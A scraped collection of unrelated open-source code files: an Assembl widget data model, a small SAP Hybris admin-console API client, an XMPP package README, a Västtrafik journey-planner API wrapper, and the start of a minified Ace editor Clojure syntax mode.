backref='showing_widget')
Idea.active_showing_widget_links = relationship(
IdeaWidgetLink, viewonly=True,
primaryjoin=((IdeaWidgetLink.idea_id == Idea.id)
& IdeaShowingWidgetLink.polymorphic_filter()
& (IdeaWidgetLink.widget_id == Widget.id)
& Widget.test_active()))
class BaseIdeaWidget(Widget):
"""A widget attached to a :py:class:`assembl.models.idea.Idea`, its ``base_idea``"""
__mapper_args__ = {
'polymorphic_identity': 'idea_view_widget',
}
base_idea_link = relationship(BaseIdeaWidgetLink, uselist=False)
base_idea_link_class = BaseIdeaWidgetLink
def interpret_settings(self, settings):
if 'idea' in settings:
self.set_base_idea_id(Idea.get_database_id(settings['idea']))
def base_idea_id(self):
if self.base_idea_link:
return self.base_idea_link.idea_id
def set_base_idea_id(self, id):
idea = Idea.get_instance(id)
if self.base_idea_link:
self.base_idea_link.idea_id = id
else:
self.base_idea_link = self.base_idea_link_class(
widget=self, idea=idea)
self.db.add(self.base_idea_link)
# This is wrong, but not doing it fails.
self.base_idea = idea
def get_ideas_url(self):
return 'local:Conversation/%d/widgets/%d/base_idea/-/children' % (
self.discussion_id, self.id)
def get_messages_url(self):
return 'local:Conversation/%d/widgets/%d/base_idea/-/widgetposts' % (
self.discussion_id, self.id)
@classmethod
def extra_collections(cls):
return (BaseIdeaCollection(),
BaseIdeaDescendantsCollection('base_idea_descendants'))
BaseIdeaWidget.base_idea = relationship(
Idea, viewonly=True, secondary=BaseIdeaWidgetLink.__table__,
primaryjoin=((BaseIdeaWidget.id == BaseIdeaWidgetLink.widget_id)
& BaseIdeaWidgetLink.polymorphic_filter()),
secondaryjoin=BaseIdeaWidgetLink.idea_id == Idea.id,
uselist=False)
class BaseIdeaCollection(RelationCollectionDefinition):
"""The 'collection' of the ``base_idea`` of this :py:class:`BaseIdeaWidget`"""
def __init__(self, name=None):
super(BaseIdeaCollection, self).__init__(
BaseIdeaWidget, BaseIdeaWidget.base_idea, name)
def decorate_query(self, query, owner_alias, last_alias, parent_instance, ctx):
widget = owner_alias
idea = last_alias
return query.join(
BaseIdeaWidgetLink,
idea.id == BaseIdeaWidgetLink.idea_id).join(
widget).filter(widget.id == parent_instance.id).filter(
widget.id == BaseIdeaWidgetLink.widget_id,
BaseIdeaWidgetLink.polymorphic_filter())
class BaseIdeaDescendantsCollection(AbstractCollectionDefinition):
"""The collection of the descendants of the ``base_idea`` of this :py:class:`BaseIdeaWidget`"""
def __init__(self, name):
super(BaseIdeaDescendantsCollection, self).__init__(
BaseIdeaWidget, name, Idea)
def decorate_query(self, query, owner_alias, last_alias, parent_instance, ctx):
widget = owner_alias
descendant = last_alias
link = parent_instance.base_idea_link
if link:
descendants_subq = link.idea.get_descendants_query()
query = query.filter(
descendant.id.in_(descendants_subq)).join(
widget, widget.id == parent_instance.id)
return query
def contains(self, parent_instance, instance):
descendant = aliased(Idea, name="descendant")
link = parent_instance.base_idea_link
if link:
descendants_subq = link.idea.get_descendants_query()
query = instance.db.query(descendant).filter(
descendant.id.in_(descendants_subq)).join(
Widget, Widget.id == parent_instance.id)
return query.count() > 0
class IdeaCreatingWidget(BaseIdeaWidget):
"""A widget where new ideas are created"""
__mapper_args__ = {
'polymorphic_identity': 'idea_creating_widget',
}
generated_idea_links = relationship(GeneratedIdeaWidgetLink)
def get_confirm_ideas_url(self):
idea_uri = self.settings_json.get('idea', None)
if idea_uri:
return ('local:Conversation/%d/widgets/%d/confirm_ideas') % (
self.discussion_id, self.id)
def get_confirm_messages_url(self):
idea_uri = self.settings_json.get('idea', None)
if idea_uri:
return ('local:Conversation/%d/widgets/%d/confirm_messages') % (
self.discussion_id, self.id)
def get_confirmed_ideas(self):
# TODO : optimize
return [idea.uri() for idea in self.generated_ideas if not idea.hidden]
def get_num_ideas(self):
return len(self.generated_idea_links)
def set_confirmed_ideas(self, idea_ids):
for idea in self.generated_ideas:
uri = idea.uri()
hide = uri not in idea_ids
idea.hidden = hide
# p = idea.proposed_in_post
# if p:
# p.hidden = hide
def get_confirmed_messages(self):
root_idea_id = self.base_idea_id()
ids = self.db.query(Content.id).join(
IdeaContentWidgetLink).join(
Idea, IdeaContentWidgetLink.idea_id == Idea.id).join(
IdeaLink, IdeaLink.target_id == Idea.id).filter(
IdeaLink.source_id == root_idea_id, ~Content.hidden
).union(
self.db.query(IdeaProposalPost.id).join(
Idea, IdeaProposalPost.idea_id == Idea.id).join(
IdeaLink, IdeaLink.target_id == Idea.id).filter(
IdeaLink.source_id == root_idea_id,
~IdeaProposalPost.hidden)
).all()
return [Content.uri_generic(id) for (id,) in ids]
def set_confirmed_messages(self, post_ids):
root_idea_id = self.base_idea_id()
for post in self.db.query(Content).join(
IdeaContentWidgetLink).join(
Idea, IdeaContentWidgetLink.idea_id == Idea.id).join(
IdeaLink, IdeaLink.target_id == Idea.id).filter(
IdeaLink.source_id == root_idea_id).all():
post.hidden = (post.uri() not in post_ids)
for post in self.db.query(IdeaProposalPost).join(
Idea, IdeaProposalPost.idea_id == Idea.id).join(
IdeaLink, IdeaLink.target_id == Idea.id).filter(
IdeaLink.source_id == root_idea_id).all():
post.hidden = (post.uri() not in post_ids)
def get_ideas_hiding_url(self):
return 'local:Conversation/%d/widgets/%d/base_idea_hiding/-/children' % (
self.discussion_id, self.id)
@classmethod
def extra_collections(cls):
class BaseIdeaCollectionC(BaseIdeaCollection):
"""The BaseIdeaCollection for an IdeaCreatingWidget"""
hide_proposed_ideas = False
def decorate_query(self, query, owner_alias, last_alias, parent_instance, ctx):
query = super(BaseIdeaCollectionC, self).decorate_query(
query, owner_alias, last_alias, parent_instance, ctx)
children_ctx = ctx.find_collection('Idea.children')
if children_ctx:
gen_idea_link = aliased(GeneratedIdeaWidgetLink)
query = query.join(
gen_idea_link,
(gen_idea_link.idea_id ==
children_ctx.class_alias.id) & (
gen_idea_link.widget_id == owner_alias.id))
return query
class BaseIdeaHidingCollection(BaseIdeaCollectionC):
"""The BaseIdeaCollection for an IdeaCreatingWidget, which will hide
created ideas."""
hide_proposed_ideas = True
def extra_permissions(self, permissions):
"""permission loophoole: allow participants (someone with the ADD_POST
permission) to create (hidden) ideas in this context."""
if P_ADD_POST in permissions and P_ADD_IDEA not in permissions:
return [P_ADD_IDEA]
return []
class BaseIdeaDescendantsCollectionC(BaseIdeaDescendantsCollection):
hide_proposed_ideas = False
def decorate_query(self, query, owner_alias, last_alias, parent_instance, ctx):
query = super(BaseIdeaDescendantsCollectionC, self).decorate_query(
query, owner_alias, last_alias, parent_instance, ctx)
children_ctx = ctx.find_collection(
'Idea.children')
if children_ctx:
gen_idea_link = aliased(GeneratedIdeaWidgetLink)
query = query.join(
gen_idea_link,
(gen_idea_link.idea_id ==
children_ctx.class_alias.id))
return query
@collection_creation_side_effects.register(
inst_ctx=Idea, ctx='IdeaCreatingWidget.base_idea')
@collection_creation_side_effects.register(
inst_ctx=Idea, ctx='IdeaCreatingWidget.base_idea_descendants')
def add_proposal_post(inst_ctx, ctx):
from .langstrings import LangString
obj = inst_ctx._instance
yield InstanceContext(
inst_ctx['proposed_in_post'],
IdeaProposalPost(
proposes_idea=obj,
creator=ctx.get_instance_of_class(User),
discussion=obj.discussion,
subject=(obj.short_title.clone()
if obj.short_title
else LangString.EMPTY(obj.db)),
body=(obj.definition.clone()
if obj.definition
else LangString.EMPTY(obj.db))))
yield InstanceContext(
inst_ctx['widget_links'],
GeneratedIdeaWidgetLink(
idea=obj,
widget=ctx.get_instance_of_class(IdeaCreatingWidget)))
@collection_creation_side_effects.register(
inst_ctx=IdeaProposalPost, ctx='BaseIdeaWidget.base_idea')
@collection_creation_side_effects.register(
inst_ctx=IdeaProposalPost,
ctx='IdeaCreatingWidget.base_idea_descendants')
def add_proposal_post_link(inst_ctx, ctx):
obj = inst_ctx._instance
yield InstanceContext(
inst_ctx['idea_links_of_content'],
IdeaContentWidgetLink(
content=obj, idea=obj.proposes_idea,
creator=obj.creator))
@collection_creation_side_effects.register(
inst_ctx=Idea, ctx='BaseIdeaWidget.base_idea_hiding')
def hide_proposal_idea(inst_ctx, ctx):
obj = inst_ctx._instance
obj.hidden = True
for subctx in add_proposal_post(inst_ctx, ctx):
yield subctx
@collection_creation_side_effects.register(
inst_ctx=IdeaProposalPost, ctx='BaseIdeaWidget.base_idea_hiding')
def hide_proposal_post(inst_ctx, ctx):
obj = inst_ctx._instance
obj.hidden = True
for subctx in add_proposal_post_link(inst_ctx, ctx):
yield subctx
return (BaseIdeaCollectionC(),
BaseIdeaHidingCollection('base_idea_hiding'),
BaseIdeaDescendantsCollectionC('base_idea_descendants'))
IdeaCreatingWidget.generated_ideas = relationship(
Idea, viewonly=True, secondary=GeneratedIdeaWidgetLink.__table__,
primaryjoin=((IdeaCreatingWidget.id == GeneratedIdeaWidgetLink.widget_id)
& GeneratedIdeaWidgetLink.polymorphic_filter()),
secondaryjoin=GeneratedIdeaWidgetLink.idea_id == Idea.id)
class InspirationWidget(IdeaCreatingWidget):
default_view = 'creativity_widget'
__mapper_args__ = {
'polymorphic_identity': 'inspiration_widget',
}
base_idea_link_class = IdeaInspireMeWidgetLink
@property
def configured(self):
active_modules = self.settings_json.get('active_modules', {})
return bool(active_modules.get('card', None)
or active_modules.get('video', None))
@classmethod
def get_ui_endpoint_base(cls):
# TODO: Make this configurable.
return "/static/widget/creativity/"
def get_add_post_endpoint(self, idea):
return 'local:Conversation/%d/widgets/%d/base_idea_descendants/%d/linkedposts' % (
self.discussion_id, self.id, idea.id)
class CreativitySessionWidget(IdeaCreatingWidget):
default_view = 'creativity_widget'
__mapper_args__ = {
'polymorphic_identity': 'creativity_session_widget',
}
@classmethod
def get_ui_endpoint_base(cls):
# TODO: Make this configurable.
return "/static/widget/session/#home"
def set_base_idea_id(self, id):
idea = Idea.get_instance(id)
if self.base_idea_link:
self.base_idea_link.idea_id = id
else:
self.base_idea_link = IdeaCreativitySessionWidgetLink(widget=self, idea=idea)
self.db.add(self.base_idea_link)
# This is wrong, but not doing it fails.
self.base_idea = idea
def notification_data(self, data):
end = data.get('end', None)
time_to_end = (parse_datetime(end) - datetime.utcnow()
).total_seconds() if end else None
return dict(
data,
widget_url=self.uri(),
time_to_end=time_to_end,
num_participants=self.num_participants(),
num_ideas=len(self.generated_idea_links))
def num_participants(self):
participant_ids = set()
# participants from user_configs
participant_ids.update((c.user_id for c in self.user_configs))
# Participants from comments
participant_ids.update((c[0] for c in self.db.query(
Post.creator_id).join(IdeaContentWidgetLink).filter(
Widget.id == self.id)))
# Participants from created ideas
participant_ids.update((c[0] for c in self.db.query(
IdeaProposalPost.creator_id).join(
Idea, GeneratedIdeaWidgetLink).filter(
Widget.id == self.id)))
return len(participant_ids)
def num_posts_by(self, user_id):
from .post import WidgetPost
return self.db.query(WidgetPost
).join(self.__class__
).filter(WidgetPost.creator_id==user_id).count()
@property
def num_posts_by_current_user(self):
from ..auth.util import get_current_user_id
user_id = get_current_user_id()
if user_id:
return self.num_posts_by(user_id)
def get_add_post_endpoint(self, idea):
return 'local:Conversation/%d/widgets/%d/base_idea/-/children/%d/widgetposts' % (
self.discussion_id, self.id, idea.id)
class VotingWidget(BaseIdeaWidget):
default_view = 'voting_widget'
__mapper_args__ = {
'polymorphic_identity': 'voting_widget',
}
votable_idea_links = relationship(VotableIdeaWidgetLink)
voted_idea_links = relationship(VotedIdeaWidgetLink)
criteria_links = relationship(
VotingCriterionWidgetLink, backref="voting_widget")
@classmethod
def get_ui_endpoint_base(cls):
# TODO: Make this configurable.
return "/static/widget/vote/"
def interpret_settings(self, settings):
if "idea" not in settings and "votable_root_id" in settings:
settings["idea"] = settings["votable_root_id"]
super(VotingWidget, self).interpret_settings(settings)
if 'criteria' in settings:
for criterion in settings['criteria']:
try:
criterion_idea = Idea.get_instance(criterion["@id"])
self.add_criterion(criterion_idea)
except Exception as e:
log.error("Missing criterion. Discarded. " + criterion)
if 'votables' in settings:
for votable_id in settings['votables']:
try:
votable_idea = Idea.get_instance(votable_id)
self.add_votable(votable_idea)
except Exception as e:
log.error("Missing votable. Discarded. " + votable_id)
elif 'votable_root_id' in settings:
try:
votable_root_idea = Idea.get_instance(
settings['votable_root_id'])
except Exception as e:
log.error("Cannot find votable root. " + settings['votable_root_id'])
return
if len(votable_root_idea.children):
for child in votable_root_idea.children:
self.add_votable(child)
else:
self.add_votable(votable_root_idea)
@property
def criteria_url(self):
return 'local:Conversation/%d/widgets/%d/criteria' % (
self.discussion_id, self.id)
@property
def votespecs_url(self):
return 'local:Conversation/%d/widgets/%d/vote_specifications' % (
self.discussion_id, self.id)
@property
def votables_url(self):
return 'local:Conversation/%d/widgets/%d/targets/' % (
self.discussion_id, self.id)
def get_user_votes_url(self, idea_id):
return 'local:Conversation/%d/widgets/%d/targets/%d/votes' % (
self.discussion_id, self.id, Idea.get_database_id(idea_id))
def all_voting_results(self):
return {
spec.uri(): spec.voting_results()
for spec in self.vote_specifications
}
def get_voting_urls(self, target_idea_id):
# TODO: Does not work yet.
return {
AbstractVoteSpecification.uri_generic(vote_spec.id):
'local:Conversation/%d/widgets/%d/vote_specifications/%d/vote_targets/%d/votes' % (
self.discussion_id, self.id, vote_spec.id,
Idea.get_database_id(target_idea_id))
for vote_spec in self.vote_specifications
}
def get_voting_results_by_spec_url(self):
return {
AbstractVoteSpecification.uri_generic(vote_spec.id):
'local:Conversation/%d/widgets/%d/vote_specifications/%d/vote_results' % (
self.discussion_id, self.id, vote_spec.id)
for vote_spec in self.vote_specifications
}
def add_criterion(self, idea):
if idea not in self.criteria:
self.criteria_links.append(VotingCriterionWidgetLink(
widget=self, idea=idea))
def remove_criterion(self, idea):
for link in self.criteria_links:
if link.idea == idea:
self.criteria_links.remove(link)
return
@property
def configured(self):
if not bool(len(self.votable_idea_links)
and len(self.vote_specifications)):
return False
items = self.settings_json.get('items', ())
return bool(len(
[item for item in items
if item.get('vote_specifications', None)]))
def set_criteria(self, ideas):
idea_ids = {idea.id for idea in ideas}
for link in list(self.criteria_links):
if link.idea_id not in idea_ids:
self.criteria_links.remove(link)
self.db.delete(link)
else:
idea_ids.remove(link.idea_id)
for idea in ideas:
if idea.id in idea_ids:
self.criteria_links.append(VotingCriterionWidgetLink(
widget=self, idea=idea))
def add_votable(self, idea):
if idea not in self.votable_ideas:
self.votable_idea_links.append(VotableIdeaWidgetLink(
widget=self, idea=idea))
def remove_votable(self, idea):
for link in self.votable_idea_links:
if link.idea == idea:
self.votable_idea_links.remove(link)
return
def set_votables(self, ideas):
idea_ids = {idea.id for idea in ideas}
for link in list(self.votable_idea_links):
if link.idea_id not in idea_ids:
self.votable_idea_links.remove(link)
self.db.delete(link)
else:
idea_ids.remove(link.idea_id)
for idea in ideas:
if idea.id in idea_ids:
self.votable_idea_links.append(VotableIdeaWidgetLink(
widget=self, idea=idea))
@classmethod
def extra_collections(cls):
class CriterionCollection(RelationCollectionDefinition):
# The set of voting criterion ideas.
# Not to be confused with http://www.criterion.com/
def __init__(self, cls):
super(CriterionCollection, self).__init__(
cls, cls.criteria)
def decorate_query(self, query, owner_alias, last_alias, parent_instance, ctx):
widget = owner_alias
idea = last_alias
return query.join(idea.has_criterion_links).join(
widget).filter(widget.id == parent_instance.id)
@collection_creation_side_effects.register(
inst_ctx=Idea, ctx='VotingWidget.criteria')
def add_criterion_link(inst_ctx, ctx):
yield InstanceContext(
inst_ctx['has_criterion_links'],
VotingCriterionWidgetLink(idea=inst_ctx._instance,
widget=ctx.owner_alias))
@collection_creation_side_effects.register(
inst_ctx=AbstractIdeaVote, ctx='VotingWidget.criteria')
def add_criterion_relation(inst_ctx, ctx):
criterion_ctx = ctx.find_collection(
'VotingWidget.criteria')
# find instance context above me
search_ctx = ctx
while (search_ctx.__parent__ and
search_ctx.__parent__ != criterion_ctx):
search_ctx = search_ctx.__parent__
assert search_ctx.__parent__
inst_ctx._instance.criterion = search_ctx._instance
class VotableCollection(RelationCollectionDefinition):
# The set of votable ideas.
def __init__(self, cls):
super(VotableCollection, self).__init__(
cls, cls.votable_ideas, "targets")
def decorate_query(self, query, owner_alias, last_alias, parent_instance, ctx):
widget = owner_alias
idea = last_alias
query = query.join(idea.has_votable_links).join(
widget).filter(widget.id == parent_instance.id)
return query
@collection_creation_side_effects.register(
inst_ctx=Idea, ctx='VotingWidget.targets')
def add_votable_link(inst_ctx, ctx):
yield InstanceContext(
inst_ctx['has_votable_links'],
VotableIdeaWidgetLink(
idea=inst_ctx._instance,
widget=ctx.parent_instance))
return (CriterionCollection(cls),
VotableCollection(cls))
# @property
# def criteria(self):
# return [cl.idea for cl in self.criteria_links]
class MultiCriterionVotingWidget(VotingWidget):
__mapper_args__ = {
'polymorphic_identity': 'multicriterion_voting_widget',
}
class TokenVotingWidget(VotingWidget):
__mapper_args__ = {
'polymorphic_identity': 'token_voting_widget',
}
class WidgetUserConfig(DiscussionBoundBase):
__tablename__ = "widget_user_config"
id = Column(Integer, primary_key=True)
widget_id = Column(
Integer,
ForeignKey('widget.id',
ondelete="CASCADE", onupdate="CASCADE"),
nullable=False, index=True)
widget = relationship(Widget, backref=backref(
"user_configs", cascade="all, delete-orphan"))
user_id = Column(
Integer,
ForeignKey('user.id',
ondelete="CASCADE", onupdate="CASCADE"),
nullable=False, index=True)
user = relationship(User)
state = Column('settings', Text) # JSON blob
@property
def state_json(self):
if self.state:
return json.loads(self.state)
return {}
@state_json.setter
def state_json(self, val):
self.state = json.dumps(val)
def get_discussion_id(self):
widget = self.widget or Widget.get(self.widget_id)
return widget.get_discussion_id()
@classmethod
def get_discussion_conditions(cls, discussion_id, alias_maker=None):
return ((cls.widget_id == Widget.id),
(Widget.discussion_id == discussion_id))
discussion = relationship(
Discussion, viewonly=True, uselist=False, secondary=Widget.__table__,
info={'rdf': QuadMapPatternS(None, ASSEMBL.in_conversation)})
crud_permissions = CrudPermissions(P_ADD_POST) # all participants...
Idea.has_votable_links = relationship(VotableIdeaWidgetLink)
Idea.has_voted_links = relationship(VotedIdeaWidgetLink)
Idea.has_criterion_links = relationship(VotingCriterionWidgetLink)
VotingWidget.votable_ideas = relationship(
Idea, viewonly=True, secondary=VotableIdeaWidgetLink.__table__,
primaryjoin=((VotingWidget.id == VotableIdeaWidgetLink.widget_id)
& VotableIdeaWidgetLink.polymorphic_filter()),
secondaryjoin=VotableIdeaWidgetLink.idea_id == Idea.id,
backref='votable_by_widget')
VotingWidget.voted_ideas = relationship(
Idea, viewonly=True, secondary=VotedIdeaWidgetLink.__table__,
primaryjoin=((VotingWidget.id == VotedIdeaWidgetLink.widget_id)
& VotedIdeaWidgetLink.polymorphic_filter()),
secondaryjoin=VotedIdeaWidgetLink.idea_id == Idea.id,
backref="voted_by_widget")
VotingWidget.criteria = relationship(
Idea,
viewonly=True, secondary=VotingCriterionWidgetLink.__table__,
primaryjoin=((VotingWidget.id == VotingCriterionWidgetLink.widget_id)
& VotingCriterionWidgetLink.polymorphic_filter()),
secondaryjoin=VotingCriterionWidgetLink.idea_id == Idea.id,
backref='criterion_of_widget')
|
PypiClean
|
/sapcx-0.1.2-py3-none-any.whl/src/api.py
|
import os
import re
import requests
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class SAPAPI:
def __init__(self, username='admin', password='nimda', hacurl='https://localhost:9002'):
self.username = username
self.password = password
self.hacurl = hacurl
self.sessionid = None
# create cache file
self.cache_dir = os.path.join(os.path.expanduser('~'), '.sap-cli')
if not os.path.exists(self.cache_dir):
os.makedirs(self.cache_dir)
# try loading session id from cache
# self.sessionid = self.__load_session_id_from_cache()
@staticmethod
def __get_csrf_token(hacurl, sessionid) -> str:
r = requests.get(hacurl, verify=False, cookies={'JSESSIONID': sessionid})
if r.ok:
csrfs = re.findall(r'<meta name="_csrf" content="(.*)" />', r.text)
return csrfs[0]
return None
@staticmethod
def __get_session_id(hacurl) -> str:
r = requests.get(hacurl, verify=False, allow_redirects=False)
if r.ok:
return r.cookies.get('JSESSIONID')
return None
def get(self, path, params) -> requests.Response:
self.__validate_session_id()
r = requests.get(self.hacurl + path, verify=False, params=params, cookies={'JSESSIONID': self.sessionid},
allow_redirects=False, timeout=5)
if not r.ok:
raise ConnectionError(f"Get request to {path} failed with status code {r.status_code}")
return r
def post(self, path, data) -> requests.Response:
self.__validate_session_id()
csrf = self.__get_csrf_token(self.hacurl, self.sessionid)
r = requests.post(self.hacurl + path, verify=False, data=data, headers={'X-CSRF-TOKEN': csrf},
cookies={'JSESSIONID': self.sessionid}, allow_redirects=False, timeout=5)
if r.ok and r.cookies.get('JSESSIONID'):
self.sessionid = r.cookies.get('JSESSIONID')
if not r.ok:
raise ConnectionError(f"Post request to {path} failed with status code {r.status_code}")
return r
def login(self):
self.sessionid = self.__get_session_id(self.hacurl)
self.__save_session_id_to_chache(self.sessionid)
self.__validate_session_id()
csrf = self.__get_csrf_token(self.hacurl + '/login', self.sessionid)
data = {
'j_username': self.username,
'j_password': self.password,
'_csrf': csrf
}
r = self.post('/j_spring_security_check', data)
if r.status_code == 302:
location = r.headers.get('Location')
if location and re.match(r'.*login_error.*', location):
raise ConnectionError("Invalid username/password")
def __load_session_id_from_cache(self):
cache_file = os.path.join(self.cache_dir, 'session')
if os.path.exists(cache_file):
with open(cache_file, 'r') as c:
data = c.read().strip()
return data
return None
def __save_session_id_to_chache(self, sessionid):
cache_file = os.path.join(self.cache_dir, 'session')
with open(cache_file, 'w+') as c:
c.write(sessionid)
def __validate_session_id(self):
if not self.sessionid or not len(self.sessionid):
raise ConnectionError("Missing session id")
|
PypiClean
|
/jarn.xmpp.twisted-0.1a1.zip/jarn.xmpp.twisted-0.1a1/README.txt
|
Introduction
============
``jarn.xmpp.twisted`` provides a basis for building XMPP applications with Plone.
In short, ``jarn.xmpp.twisted`` includes:
* Extensions to the `wokkel`_ package by implementing parts of the following XMPP extensions:
* `XEP-0071`_ XHTML-IM.
* `XEP-0144`_ Roster Item Exchange.
* `XEP-0060`_ Publish-Subscribe.
* `XEP-0248`_ PubSub Collection Nodes.
* `XEP-0133`_ Service Administration.
* A `Twisted`_ reactor that runs side-by-side with the Zope instance.
* Utilities that provide XMPP clients of two sorts, a *deferred* client that initially connects, executes a task and disconnects as soon as it is done, as well as a normal client that remains connected and can respond to XMPP events.
* An XMPP component base class for writing custom components.
``jarn.xmpp.twisted`` is part of a suite, with the other packages being:
* `jarn.xmpp.core`_, provides facilities for presence, messaging, chatting and microblogging.
* `jarn.xmpp.collaboration`_ provides an XMPP protocol to do real-time collaborative editing as well as a Plone-targeted implementation.
Installation
============
``jarn.xmpp.twisted`` requires a working XMPP server installation. Please refer to the `jarn.xmpp.core`_ documentation on how to set it up.
Credits
=======
* Most of this work was done using the 10% time available to `Jarn AS`_ employees for the development of open-source projects.
.. _Twisted: http://twistedmatrix.com
.. _wokkel: http://wokkel.ik.nu
.. _XEP-0071: http://xmpp.org/extensions/xep-0071.html
.. _XEP-0144: http://xmpp.org/extensions/xep-0144.html
.. _XEP-0060: http://xmpp.org/extensions/xep-0060.html
.. _XEP-0248: http://xmpp.org/extensions/xep-0248.html
.. _XEP-0133: http://xmpp.org/extensions/xep-0133.html
.. _Jarn AS: http://jarn.com
.. _jarn.xmpp.core: http://pypi.python.org/pypi/jarn.xmpp.core
.. _jarn.xmpp.collaboration: http://pypi.python.org/pypi/jarn.xmpp.collaboration
|
PypiClean
|
/vtjp-0.1.14.tar.gz/vtjp-0.1.14/vasttrafik/journy_planner.py
|
import base64
import json
import requests
from datetime import datetime
from datetime import timedelta
TOKEN_URL = 'https://api.vasttrafik.se/token'
API_BASE_URL = 'https://api.vasttrafik.se/bin/rest.exe/v2'
DATE_FORMAT = '%Y-%m-%d'
TIME_FORMAT = '%H:%M'
class Error(Exception):
pass
def _get_node(response, *ancestors):
""" Traverse tree to node """
document = response
for ancestor in ancestors:
if ancestor not in document:
return {}
else:
document = document[ancestor]
return document
class JournyPlanner:
""" Journy planner class"""
def __init__(self, key, secret, expiery=59):
self._key = key
self._secret = secret
self._expiery = expiery
self.update_token()
def update_token(self):
""" Get token from key and secret """
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic ' + base64.b64encode(
(self._key + ':' + self._secret).encode()).decode()
}
data = {'grant_type': 'client_credentials'}
response = requests.post(TOKEN_URL, data=data, headers=headers)
obj = json.loads(response.content.decode('UTF-8'))
self._token = obj['access_token']
self._token_expire_date = (
datetime.now() +
timedelta(minutes=self._expiery))
# LOCATION
def location_allstops(self):
""" location.allstops """
response = self._request(
'location.allstops')
return _get_node(response, 'LocationList', 'StopLocation')
def location_nearbystops(self, origin_coord_lat, origin_coord_long):
""" location.nearbystops """
response = self._request(
'location.nearbystops',
originCoordLat=origin_coord_lat,
originCoordLong=origin_coord_long)
return _get_node(response, 'LocationList', 'StopLocation')
def location_nearbyaddress(self, origin_coord_lat, origin_coord_long):
""" location.nearbyaddress """
response = self._request(
'location.nearbyaddress',
originCoordLat=origin_coord_lat,
originCoordLong=origin_coord_long)
return _get_node(response, 'LocationList', 'CoordLocation')
def location_name(self, name):
""" location.name """
response = self._request(
'location.name',
input=name)
return _get_node(response, 'LocationList', 'StopLocation')
# ARRIVAL BOARD
def arrivalboard(self, stop_id, date=None, direction=None):
""" arrivalBoard """
date = date if date else datetime.now()
request_parameters = {
'id': stop_id,
'date': date.strftime(DATE_FORMAT),
'time': date.strftime(TIME_FORMAT)
}
if direction:
request_parameters['directiona'] = direction
response = self._request(
'arrivalBoard',
**request_parameters)
return _get_node(response, 'ArrivalBoard', 'Arrival')
# DEPARTURE BOARD
def departureboard(self, stop_id, date=None, direction=None):
""" departureBoard """
date = date if date else datetime.now()
request_parameters = {
'id': stop_id,
'date': date.strftime(DATE_FORMAT),
'time': date.strftime(TIME_FORMAT)
}
if direction:
request_parameters['direction'] = direction
response = self._request(
'departureBoard',
**request_parameters)
return _get_node(response, 'DepartureBoard', 'Departure')
# TRIP
def trip(self, origin_id, dest_id, date=None):
""" trip """
date = date if date else datetime.now()
response = self._request(
'trip',
originId=origin_id,
destId=dest_id,
date=date.strftime(DATE_FORMAT),
time=date.strftime(TIME_FORMAT))
return _get_node(response, 'TripList', 'Trip')
def _request(self, service, **parameters):
""" request builder """
urlformat = "{baseurl}/{service}?{parameters}&format=json"
url = urlformat.format(
baseurl=API_BASE_URL,
service=service,
parameters="&".join([
"{}={}".format(key, value) for key, value in parameters.items()
]))
if datetime.now() > self._token_expire_date:
self.update_token()
headers = {'Authorization': 'Bearer ' + self._token}
res = requests.get(url, headers=headers)
if res.status_code == 200:
return json.loads(res.content.decode('UTF-8'))
else:
raise Error('Error: ' + str(res.status_code) +
str(res.content))
|
PypiClean
|
/realms-wiki-0.9.3.tar.gz/realms-wiki-0.9.3/realms/static/vendor/ace-builds/src-min/mode-clojure.js
|
define("ace/mode/clojure_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("./text_highlight_rules").TextHighlightRules,s=function(){var e="* *1 *2 *3 *agent* *allow-unresolved-vars* *assert* *clojure-version* *command-line-args* *compile-files* *compile-path* *e *err* *file* *flush-on-newline* *in* *macro-meta* *math-context* *ns* *out* *print-dup* *print-length* *print-level* *print-meta* *print-readably* *read-eval* *source-path* *use-context-classloader* *warn-on-reflection* + - -> ->> .. / < <= = == > > >= >= accessor aclone add-classpath add-watch agent agent-errors aget alength alias all-ns alter alter-meta! alter-var-root amap ancestors and apply areduce array-map aset aset-boolean aset-byte aset-char aset-double aset-float aset-int aset-long aset-short assert assoc assoc! assoc-in associative? atom await await-for await1 bases bean bigdec bigint binding bit-and bit-and-not bit-clear bit-flip bit-not bit-or bit-set bit-shift-left bit-shift-right bit-test bit-xor boolean boolean-array booleans bound-fn bound-fn* butlast byte byte-array bytes cast char char-array char-escape-string char-name-string char? chars chunk chunk-append chunk-buffer chunk-cons chunk-first chunk-next chunk-rest chunked-seq? class class? clear-agent-errors clojure-version coll? comment commute comp comparator compare compare-and-set! compile complement concat cond condp conj conj! cons constantly construct-proxy contains? count counted? create-ns create-struct cycle dec decimal? declare definline defmacro defmethod defmulti defn defn- defonce defstruct delay delay? deliver deref derive descendants destructure disj disj! dissoc dissoc! distinct distinct? doall doc dorun doseq dosync dotimes doto double double-array doubles drop drop-last drop-while empty empty? ensure enumeration-seq eval even? every? false? ffirst file-seq filter find find-doc find-ns find-var first float float-array float? floats flush fn fn? fnext for force format future future-call future-cancel future-cancelled? future-done? future? gen-class gen-interface gensym get get-in get-method get-proxy-class get-thread-bindings get-validator hash hash-map hash-set identical? identity if-let if-not ifn? import in-ns inc init-proxy instance? int int-array integer? interleave intern interpose into into-array ints io! isa? iterate iterator-seq juxt key keys keyword keyword? last lazy-cat lazy-seq let letfn line-seq list list* list? load load-file load-reader load-string loaded-libs locking long long-array longs loop macroexpand macroexpand-1 make-array make-hierarchy map map? mapcat max max-key memfn memoize merge merge-with meta method-sig methods min min-key mod name namespace neg? newline next nfirst nil? nnext not not-any? not-empty not-every? not= ns ns-aliases ns-imports ns-interns ns-map ns-name ns-publics ns-refers ns-resolve ns-unalias ns-unmap nth nthnext num number? odd? or parents partial partition pcalls peek persistent! pmap pop pop! pop-thread-bindings pos? pr pr-str prefer-method prefers primitives-classnames print print-ctor print-doc print-dup print-method print-namespace-doc print-simple print-special-doc print-str printf println println-str prn prn-str promise proxy proxy-call-with-super proxy-mappings proxy-name proxy-super push-thread-bindings pvalues quot rand rand-int range ratio? rational? rationalize re-find re-groups re-matcher re-matches re-pattern re-seq read read-line read-string reduce ref ref-history-count ref-max-history ref-min-history ref-set refer refer-clojure release-pending-sends rem remove remove-method remove-ns remove-watch repeat repeatedly replace replicate require reset! reset-meta! resolve rest 